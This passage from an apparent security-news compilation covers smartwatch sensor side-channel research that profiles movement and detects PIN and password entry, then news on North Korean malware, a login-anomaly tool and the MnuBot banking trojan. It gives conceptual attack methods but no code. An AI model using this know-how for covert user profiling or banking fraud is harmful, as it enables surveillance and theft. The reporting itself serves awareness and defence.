When the user is walking, the hand wearing the smartwatch oscillates like a pendulum. Pendulum swings are a periodic process. Therefore, if there are areas on the graph where the acceleration or orientation readings from the motion sensor vary according to the law of periodicity, it can be assumed that the user was walking at that moment. When analyzing the data, it is worth considering the accelerometer and gyroscope readings as a whole.

Let’s take a closer look at the areas with the greatest oscillations over short time intervals (the purple areas Pattern1, Pattern3, and Pattern5).

Accelerometer and gyroscope readings during walking

In our case, periodic oscillations of the hand were observed for a duration of 12 minutes (Pattern1, figure above). Without requesting geoinformation, it’s difficult to say exactly where the user was going, although a double numerical integration of the acceleration data shows with an accuracy up to the integration constants (initial velocity and coordinates) that the person was walking somewhere, and with varying characteristic velocity.

Result of the numerical integration of the accelerometer data, which gives an estimate of the user’s movement along the x and y axes in the space of one hour (z-axis displacement is zero, so the graph does not show it)

Note that plotting the Y-axis displacement relative to the X-axis displacement gives the person’s approximate path. The distances here are not overly precise, but they are in the order of thousands of meters, which is actually quite impressive, because the method is very primitive. To refine the distance traveled, anthropometric data can be used to estimate the length of each step (which is basically what fitness trackers do), but we shall not include this in our study.

Approximate path of the person under observation, determined on the basis of numerically integrating the accelerometer data along the X and Y axes

It is more difficult to analyze the less active areas. Clearly, the person was at rest during these periods. The orientation of the watch does not change, and there is acceleration, which suggests that the person is moving by car (or elevator).

Another 22-minute segment is shown below. This is clearly not walking — there are no observable periodic oscillations of the signal. However, we see a periodic change in the acceleration signal envelope along one axis. It might be a means of public transport that moves in a straight line, but with stops. What is it? Some sort of public transportation?

Accelerometer data when traveling on public transport

Here’s another time slice.

Pattern 3, accelerometer data

This seems to be a mixture of short periods of walking (for a few seconds), pauses, and abrupt hand movements. The person is presumably indoors.

Below we interpret all the areas on the graph.

Accelerometer and gyroscope readings with decoding of areas

These are three periods of walking (12, 3, and 5 minutes) interspersed with subway journeys (20 and 24 minutes). The short walking interval has some particular characteristics, since it involved changing from one subway line to another. These features are clearly visible, but our interest was in determining them using algorithms that can be executed on the wearable devices themselves. Therefore, instead of neural networks (which we know to be great at this kind of task), we used a simple cross-correlation calculation.

Taking two walking patterns (Walking1 and Walking2), we calculated their cross-correlation with each other and the cross-correlation with noise data using 10-second signal data arrays.

Experiment max (cor) Ax max (cor) Ay max (cor) Az max (cor) Wx max (cor) Wy max (cor) Wz
Walking1 and Walking2 0.73 0.70 0.64 0.62 0.41 0.83
Walking1 and Noise 0.33 0.30 0.32 0.30 0.33 0.33
Maxima of the functions for cross-correlation of walking patterns with each other and with an arbitrary noise pattern

It can be seen from the table that even this elementary approach for calculating cross-correlation functions allows us to identify the user’s movement patterns within his/her “digital snapshot” with an accuracy of up to 83% (given a very rough interpretation of the correlation). This indicator may not seem that high, but it should be stressed that we did not optimize the sample size and did not use more complex algorithms, for example, principle component analysis, which is assumed to work quite well in determining the characteristic parts of the signal log.

What does this provide to the potential attackers? Having identified the user’s movements in the subway, and knowing the characteristic directions of such movement, we can determine which subway line the user is traveling on. Sure, it would be much easier having data about the orientation of the X and Y axes in space, which could be obtained using a magnetometer. Unfortunately, however, the strong electromagnetic pickup from the electric motors, the low accuracy of determining a northerly direction, and the relatively few magnetometers in smartwatches forced us to abandon this idea.

Without data on the orientation of the X and Y axes in space (most likely, different for individual periods), the problem of decoding the motion trajectory becomes a geometric task of overlaying time slices of known length onto the terrain map. Again, placing ourselves in the attacker’s shoes, we would look for the magnetic field bursts indicate the acceleration/deceleration of an electric train (or tram or trolleybus), which can provide additional information allowing us to work out the number of interim points in the time slices of interest to us. But this too is outside the scope of our study.

Cyberphysical interception of critical data
But what does this all reveal about the user’s behavior? More than a bit, it turns out. It is possible to determine when the user arrives at work, signs into a company computer, unlocks his or her phone, etc. Comparing data on the subject’s movement with the coordinates, we can pinpoint the moments when they visited a bank and entered a PIN code at an ATM.

PIN codes
How easy is it to capture a PIN code from accelerometer and gyroscope signals from a smartwatch worn on the wrist? We asked four volunteers to enter personal PINs at a real ATM.

Accelerometer signals when entering a PIN code on an ATM keypad

Jumping slightly ahead, it’s not so simple to intercept an unencrypted PIN code from sensor readings by elementary means. However, this section of the “accelerometer log” gives away certain information — for example, the first half of the graph shows that the hand is in a horizontal position, while the oscillating values in the second half indicate keys being pressed on the ATM keypad. With neural networks, signals from the three axes of the accelerometer and gyroscope can be used to decipher the PIN code of a random person with a minimum accuracy of 80% (according to colleagues from Stevens Institute of Technology). The disadvantage of such an attack is that the computing power of smartwatches is not yet sufficient to implement a neural network; however, it is quite feasible to identify this pattern using a simple cross-correlation calculation and then transfer the data to a more powerful machine for decoding. Which is what we did, in fact.

Experiment max (cor) Ax max (cor) Ay max (cor) Az max (cor) Wx max (cor) Wy max (cor) Wz
One person and different tries 0.79 0.87 0.73 0.82 0.51 0.81
Maxima of the functions for cross-correlation of PIN entry data at an ATM

Roughly interpreting these results, it is possible to claim 87% accuracy in recovering the PIN entry pattern from the general flow of signal traffic. Not bad.

Passwords and unlock codes
Besides trips to the ATM, we were interested in two more scenarios in which a smartwatch can undermine user security: entering computer passwords and unlocking smartphones. We already knew the answer (for computers and phones) using a neural network, of course, but we still wanted to explore first-hand, so to speak, the risks of wearing a smartwatch.

Sure, capturing a password entered manually on a computer requires the person to wear a smartwatch on both wrists, which is an unlikely scenario. And although, theoretically, dictionaries could be used to recover semantically meaningful text from one-handed signals, it won’t help if the password is sufficiently strong. But, again, the main danger here is less about the actual recovery of the password from sensor signals than the ease of detecting when it is being entered. Let’s consider these scenarios in detail.

We asked four people to enter the same 13-character password on a computer 20 times. Similarly, we conducted an experiment in which two participants unlocked an LG Nexus 5X smartphone four times each with a 4-digit key. We also logged the movements of each participant when emulating “normal” behavior, especially in chat rooms. At the end of the experiment, we synchronized the time of the readings, cutting out superfluous signals.

In total, 480 discrete functions were obtained for all sensor axes. Each of them contains 250-350 readings, depending on the time taken to enter the password or arbitrary data (approximately three seconds).

Signal along the accelerometer and gyroscope axes for four attempts by one person to enter one password on a desktop computer

To the naked eye, the resulting graphs are almost identical; the extremes coincide, partly because the password and mode of entry were identical in all attempts. This means that the digital fingerprints produced by one and the same person are very similar to each other.

Signals along the accelerometer and gyroscope axes for attempts to enter the same password by different people on a desktop computer

When overlaying the signals received from different people, it can be seen that, although the passphrase is the same, it is entered differently, and even visually the extremes do not coincide!

Attempts to enter a smartphone unlock code by two different people

It is a similar story with mobile phones. Moreover, the accelerometer captures the moments when the screen is tapped with the thumb, from which the key length can be readily determined.

But the eye can be deceived. Statistics, on the other hand, are harder to hoodwink. We started with the simplest and most obvious method of calculating the cross-correlation functions for the password entry attempts by one person and for those by different people.

The table shows the maxima of the functions for cross-correlation of data for the corresponding axes of the accelerometer and gyroscope.

Experiment max (cor) Ax max (cor) Ay max (cor) Az max (cor) Wx max (cor) Wy max (cor) Wz
One person 0.92 0.63 0.71 0.55 0.76 0.96
Different persons 0.65 0.35 0.31 0.23 0.37 0.76
Maxima of the functions for cross-correlation of password input data entered by different people on a desktop computer

Broadly speaking, it follows that even a very simple cross-correlation calculation can identify a person with up to 96% accuracy! If we compare the maxima of the cross-correlation function for signals from different people in arbitrary text input mode, the correlation maximum does not exceed 44%.

Experiment max (cor) Ax max (cor) Ay max (cor) Az max (cor) Wx max (cor) Wy max (cor) Wz
One person and different activity 0.32 0.27 0.39 0.26 0.30 0.44
Maxima of the functions for cross-correlation of data for different activities (password entry vs. usual surfing)

Experiment max (cor) Ax max (cor) Ay max (cor) Az max (cor) Wx max (cor) Wy max (cor) Wz
One person 0.64 0.47 0.56 0.41 0.30 0.58
Different persons 0.33 0.40 0.40 0.32 0.38 0.34
Maxima of the functions for cross-correlation of data for an unlock code entered by one person and by different people

Note that the smallest cross-correlation function values were obtained for entering the smartphone unlock code (up to 64%), and the largest (up to 96%) for entering the computer password. This is to be expected, since the hand movements and corresponding acceleration (linear and angular) are minimal in the case of unlocking.

However, we note once more that the computing power available to a smartwatch is sufficient to calculate the correlation function, which means that a smart wearable gadget can perform this task by itself!

Speaking from the information security point of view, we can conclude that, without a doubt, portable cyberphysical systems expand the attack surface for potential intruders. That said, the main danger lies not in the direct interception of input data — that is quite difficult (the most successful results are achieved using neural networks) and thus far the accuracy leaves much to be desired. It lies instead in the profiling of users’ physical behavior based on signals from embedded sensors. Being “smart,” such devices are able to start and stop logging information from sensors not only through external commands, but on the occurrence of certain events or the fulfillment of certain conditions.

The recorded signals can be transmitted by the phone to the attacker’s server whenever the latter has access to the Internet. So an unassuming fitness app or a new watch face from the Google Play store can be used against you, right now in fact. The situation is compounded by the fact that, in addition to this app, simply sending your geotag once and requesting the email address linked to your Google Play account is enough to determine, based on your movements, who you are, where you’ve been, your smartphone usage, and when you entered a PIN at an ATM.

We found that extracting data from traffic likely to correspond to a password or other sensitive information (name, surname, email address) is a fairly straightforward task. Applying the full power of available recognition algorithms to these data on a PC or in cloud services, attackers, as shown earlier, can subsequently recover this sensitive information from accelerometer and gyroscope signal logs. Moreover, the accumulation of these signals over an extended period facilitates the tracking of user movements — and that’s without geoinformation services (such as GPS/GLONASS, or base station signals).

We established that the use of simple methods of analyzing signals from embedded sensors such as accelerometers and gyroscopes makes it possible (even with the computing power of a wearable device) to determine the moments when one and the same text is entered (for example, authentication data) to an accuracy of up to 96% for desktop computers and up to 64% for mobile devices. The latter accuracy could be improved by writing more complex algorithms for processing the signals received, but we intentionally applied the most basic mathematical toolbox. Considering that we viewed this experiment through the prism of the threat to corporate users, the results obtained for the desktop computer are a major cause for concern.

A probable scenario involving the use of wearable devices relates to downloading a legitimate app to a smartwatch — for example, a fitness tracker that periodically sends data packets of several dozen kilobytes in size to a server (for example, the uncompressed “signal signature” for the 13-character password was about 48 kilobytes).

Since the apps themselves are legitimate, we assume that, alongside our Android Wear/Android for Smartwatch test case, this scenario can be applied to Apple smartwatches, too.

There are several indications that an app downloaded onto a smartwatch might not be safe.

If, for instance, the app sends a request for data about the user’s account (the GET_ACCOUNTS permission in Android), this is cause for concern, since cybercriminals need to match the “digital fingerprint” with its owner. However, the app can also allow the user to register by providing an email address — but in this case you are at least free to enter an address different to that of the Google Play account to which your bank card is linked.
If the app additionally requests permission to send geolocation data, your suspicions should be aroused even further. The obvious advice in this situation is not to give additional permissions to fitness trackers that you download onto your smartwatch, and to specify a company email address at the time of registration.
A short battery life can also be a serious cause for concern. If your gadget discharges in just a few hours, this is a sign that you may be under observation. Theoretically, a smartwatch can store logs of your activity with length up to dozens of hours and upload this data later.
In general, we recommend keeping a close eye on smartwatches sported by employees at your office, and perhaps regulating their use in the company’s security policies. We plan to continue our research into cyberphysical systems such as wearable smart gadgets, and the additional risks of using them.

U.S. Attributes Two More Malware Families to North Korea
30.5.18 securityweek 

The U.S. Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI) have issued another joint technical alert on the North Korea-linked threat group known as Hidden Cobra.

The latest alert attributes the Joanap backdoor trojan and the Brambul worm to the North Korean government. It provides IP addresses and other indicators of compromise (IoC) associated with these threats in an effort to help organizations protect their networks against attacks.

The threat actor tracked by the U.S. government as Hidden Cobra is known in the cybersecurity community as Lazarus Group, which is believed to be behind several high-profile attacks, including ones targeting Sony Pictures, Bangladesh’s central bank and various financial organizations. Some of the group’s campaigns are tracked as Operation Blockbuster, Dark Seoul and Operation Troy. Five Eyes countries have also officially blamed Lazarus for the WannaCry attack.US government shares details on Joanap and Brambul malware used by North Korea

According to the DHS and FBI, Joanap and Brambul have been used by Hidden Cobra since at least 2009 in attacks aimed at organizations in the United States and elsewhere, including in the media, financial, aerospace and critical infrastructure sectors.

Joanap is a two-stage malware that allows hackers to exfiltrate data and install other threats on the system.

Brambul is a worm that abuses the Server Message Block (SMB) protocol to spread to other systems through dictionary attacks. Its list of capabilities also includes harvesting system information (which it sends to the attackers via email), accepting command-line arguments, and executing what analysts call a “suicide script.”

The DHS and the FBI have published several alerts in the past year describing Hidden Cobra tools, including Sharpknot, Hardrain, Badcall, Bankshot, Fallchil, Volgmer, and Delta Charlie.

North Korea has been blamed for several major attacks, but Pyongyang has always denied the accusations. On the other hand, threat actors linked to North Korea don’t seem to be deterred by accusations and the numerous reports published in the past years by cybersecurity companies, and they continue launching attacks, including with new tools and zero-day exploits.

Open Source Tool From FireEye Helps Detect Malicious Logins
30.5.18 securityweek 

FireEye has released GeoLogonalyzer, an open source tool that can help organizations detect malicious logins based on geolocation and other data.

Many organizations need to allow their employees to connect to enterprise systems from anywhere in the world. However, threat actors often rely on stolen credentials to access a targeted company’s systems.

Identifying legitimate logins and malicious ones can be challenging, but FireEye hopes to solve the problem with its GeoLogonalyzer, which leverages what the company calls GeoFeasibility.

GeoLogonalyzer analyzes authentication logs containing timestamps, usernames, and IP addresses, and highlights any changes, including related to anomalies, data center hosting information, location data, ASN information, and time and distance metrics.

GeoFeasibility looks at the location of the user who initiated a login in an effort to determine if the login is suspicious or not. For example, if a user connects to a company VPN from the United States, they are unlikely to connect to the VPN from Australia a few minutes later.

In addition to checking if accounts authenticate from two distant geographical locations in a short timeframe, GeoLogonalyzer looks at accounts that usually log in from IP addresses registered to one physical location, but also authenticate from places where the user is unlikely to be.

Logins from a foreign location where no employees reside or are expected to travel to, and where the organization does not have any business contacts will also raise a red flag.

Less obvious login patterns may also be considered suspicious, including user accounts that typically log in from one IP address, subnet or ASN, but also have a small number of logins from a different source, or ones that log in from IP addresses registered to cloud server hosting providers. Users who log in from multiple source hostnames or with multiple VPN clients are also considered suspicious.

Additional information and usage instructions are available on GitHub and FireEye’s blog post.

New Banking Trojan MnuBot uses SQL Server for Command and Control
30.5.18 securityaffairs 

Researchers at IBM X-Force Research team discovered a new Delphi-based banking Trojan dubbed MnuBot that leverages Microsoft SQL Server for communication with the command and control (C&C).
The MnuBot Trojan implements a two-stage attack flow, it is composed of two main components that are tasked for the two stages.

In the first stage, the malware searches for a file called Desk.txt within the %AppData%Roaming folder.

If the file is not present, MnuBot creates it, creates a new desktop and switches the user workspace to that newly created desktop that runs side by side to the legitimate user desktop.

MnuBot continually checks the foreground window name in the new desktop searching for bank names in its configuration, then it will query the server for the second stage executable according to the specific bank name that was found.

The MnuBot implements the following capabilities:

Creating browser and desktop screenshots
Simulating user clicks and keystrokes
Restarting the victim machine
Uninstalling Trusteer Rapport from the system
Creating a form to overlay the bank’s forms and steal the data the user enters into the form
The malware downloads the malicious payload in as C:\Users\Public\Neon.exe, this binary contains the attack logic.

“the MnuBot malware uses a Microsoft SQL Server database server to communicate with the sample and send commands to be executed on the infected machine.” read the report published by IBM.

“Like any other RAT, MnuBot needs to receive commands from the server. To do so, it constantly queries the Microsoft SQL database server for a new command.”

Once the malware has infected the systems, it connects the C&C server to fetch the initial configuration. Experts found SQL server details (server address, port, username, and password) hardcoded inside the malware in an encrypted form.


The configuration also includes:

Queries to be performed
Commands the malicious actor can send
Files MnuBot will interact with
Bank websites that are being targeted
If the MnuBot malware is not able to access the configuration file it will shut itself down and does not perform any malicious activity on the infected machine.

The MnuBot uses the configuration to dynamically change the malicious activity (e.g., the banking sites that are targeted) and implement anti-research mechanisms.

Every time the attacker wants to send commands to the malware he updates specific columns inside a table stored in a database named jackjhonson.

“The attacker sends commands to the victims by updating specific columns inside a table called USUARIOCONTROLEXGORDO, which is stored in a database named jackjhonson.” continues analysis.

“A few interesting columns include the following:

COMP_ ACAO: This column identifies the type of command to be executed.
POSICAOMOUSE: In case the command is to simulate a user click, this column will be updated with the cursor position.
USER_IMAGEM: This column will be updated with the screenshot BMP image from the infected machine in case a screenshot was requested.
VALORINPUT: This column contains the input in case the command was input insertion.”
Like other malware families, MnuBot implements a full-screen overlay form to display victims overlaying forms used to trick them into providing sensitive data.

“Those forms are a type of social engineering to keep the user waiting. In the background, the cybercriminal takes control over the user endpoint and attempts to perform an illegal transaction via the victim’s open banking session.” concludes the report.

“MnuBot is an excellent example of many malware families in the Brazilian region. It holds many characteristics that are typical of other recently discovered malware strains. For example, the overlaying forms and the new desktop creation are well-known techniques that malware authors in the region use today.”

New Trojan Uses SQL Server for C&C
29.5.18 securityweek

A recently discovered banking Trojan leverages Microsoft SQL Server for communication with the command and control (C&C), IBM has discovered.

Dubbed MnuBot, the malware uses the database server for communication with the bot and to send commands to the infected machines. The Trojan features two components, each in charge of a different phase of a two-stage attack flow.

During the initial stage, the malware searches for a file called Desk.txt within the %AppData%Roaming folder. This file lets MnuBot know which desktop is currently running and, if it exists, the Trojan does nothing, because it knows it runs in a new desktop.

If the file doesn’t exist, then MnuBot creates it and a new desktop, and then switches the user workspace to the new desktop, which runs alongside the legitimate user desktop.

On the newly created desktop, MnuBot constantly checks the foreground window name and, if it finds a name similar to a bank name in its configuration, the malware queries the server for the second stage executable corresponding to that bank name.

The executable, which is saved as C:\Users\Public\Neon.exe, is actually a Remote Access Trojan (RAT) that provides the attacker with full control over the target machine. It also includes functionality unique to MnuBot, IMB explains.

Once the infection stage has been completed, the malware connects to the C&C server to fetch the initial configuration. The necessary SQL server details, such as server address, port, username and password, are hardcoded inside the malware in an encrypted form (they are decrypted dynamically just before initializing the connection).

Strings in the configuration include queries the malware should perform, supported commands, files to interact with, and targeted bank websites. Should the configuration be missing, MnuBot shuts itself down, meaning no malicious activity is performed on the infected machine.

The attackers can dynamically change MnuBot’s malicious activity by modifying the configuration directly on the server, and can also prevent researchers from reverse engineering the malware sample behavior if the author takes the server down.

Once the user opens the webpage of a targeted website, the second-stage payload provides the malware operator with an open session to the bank’s website, directly from the victim machine.

The malware provides the operator with the ability to create browser and desktop screenshots, log keystrokes, simulate user clicks and keystrokes, restart the victim machine, uninstall Trusteer Rapport from the system, create a form to overlay the bank’s page and steal the data the user enters there.

To send commands to the victim machine, the attacker updates specific columns inside a table stored in a database named jackjhonson. Columns there are meant to identify the type of command to be executed, to simulate a user click, to store screenshot bmp images from the infected machines in case a screenshot is needed, and to store the input required for input insertion commands.

MnuBot uses a full screen overlay form to prevent users from accessing the legitimate banking website and to trick them into revealing sensitive data. In the background, the malware operator takes control over the system and attempts to perform an illegal transaction via the already opened banking session.

The operator also asks the user for additional details if needed, using another overlaying form. The executable downloaded during the second stage of the attack contains the relevant social engineering forms the cybercriminals need for their nefarious operations.

MnuBot, which was observed targeting users in Brazil, is a great example of how malware authors constantly attempt to evolve their creations to evade regular anti-virus detection. In this case, they attempted to hide malicious network communications using seemingly innocent MS SQL traffic.